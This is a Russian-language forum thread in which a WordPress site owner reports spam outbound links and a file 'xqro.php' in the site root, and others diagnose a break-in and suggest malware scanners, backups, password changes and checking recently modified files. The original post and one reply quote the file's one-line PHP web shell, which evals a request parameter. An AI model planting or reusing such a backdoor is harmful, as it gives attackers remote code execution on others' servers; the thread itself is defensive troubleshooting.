Что за файл в корне

12
V
На сайте с 16.12.2010
Offline
143
4996

На сайте появилось множество исходящих ссылок. Нашел странные файлы в корне сайта. Один из низ "xqro.php" а в нем код

<?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['abc']."')", "laterain testin9"); ?> Сайт на вордпресс. :mad::mad::mad:

LEOnidUKG
На сайте с 25.11.2006
Offline
1762
#1

Взломали вас и размещают ссылки.

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
V
На сайте с 16.12.2010
Offline
143
#2
LEOnidUKG:
Взломали вас и размещают ссылки.

Меня взломали или сайт мой

S
На сайте с 30.09.2016
Offline
469
#3
Vistaa:
Нашел странные файлы в корне сайта

Полагаю, такие файлы не только в корне, но и в других местах. А таким кодом можно не только ссылки размещать, но и вообще всё что угодно с Вашим сайтом делать.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
V
На сайте с 16.12.2010
Offline
143
#4

После инсталлкуб как плагин добавил, возможно совпадение получилось...

Психиатр
На сайте с 16.11.2010
Offline
360
#5
Vistaa:
Меня взломали или сайт мой

Ну если так вопрос ставится, то вас.

A9
На сайте с 04.01.2012
Offline
317
#6

Сканируйте сайт айболитом, можно сначала грепнуть и sed удалить этот код, а потом просканировать айболитом.

Либо восстанавливайтесь из бекапа - и забудьте про этот плагин, либо купите его, я так понимаю Вы ломанный ставили.

https://qckl.net - аренда выделенных серверов от 9.99€! Адекватная политика абуз! При оплате от 6 мес. - 3 мес. в подарок! Заказывайте!
S2
На сайте с 30.12.2015
Offline
307
#7
adel92:
Сканируйте сайт айболитом, можно сначала грепнуть и sed удалить этот код, а потом просканировать айболитом.
Либо восстанавливайтесь из бекапа - и забудьте про этот плагин, либо купите его, я так понимаю Вы ломанный ставили.

Очень опасно не специалисту чистить сайт, а зачастую бекапов и нет. Для чистки надо минимальные знания php хотя бы и понимать, что делаешь. А SED, просто заменять код - может с большой долей вероятности сломать сайт. Лучше обратится к специалистам.

Нас часто просят, даже за деньги, почистить сайт от вирусов. В основном отказываем, т.к. поддержка - это не специалисты по безопасности сайтов. Что говорить за клиентов.

A9
На сайте с 04.01.2012
Offline
317
#8

Возможно Вы правы.

Тогда прямая дорога в Ревизиум.

Там помогут, с гарантией.

I
На сайте с 06.02.2017
Offline
5
#9
Vistaa:
На сайте появилось множество исходящих ссылок. Нашел странные файлы в корне сайта. Один из низ "xqro.php" а в нем код
<?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['abc']."')", "laterain testin9"); ?> Сайт на вордпресс. 😡😡😡

Рекомендуем пройтись антивирусом, например, maldet. Посмотреть файлы, которые менялись или создавались недавно, например, командой stat --format %y $(ls -t $(find alfa/ -type f) | head -n 1). Обязательно измените все свои пароли. Если будут вопросы, пишите в личку, поможем

S
На сайте с 30.09.2016
Offline
469
#10
insecurity:
ls -t

А чё так, не ls -c ?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий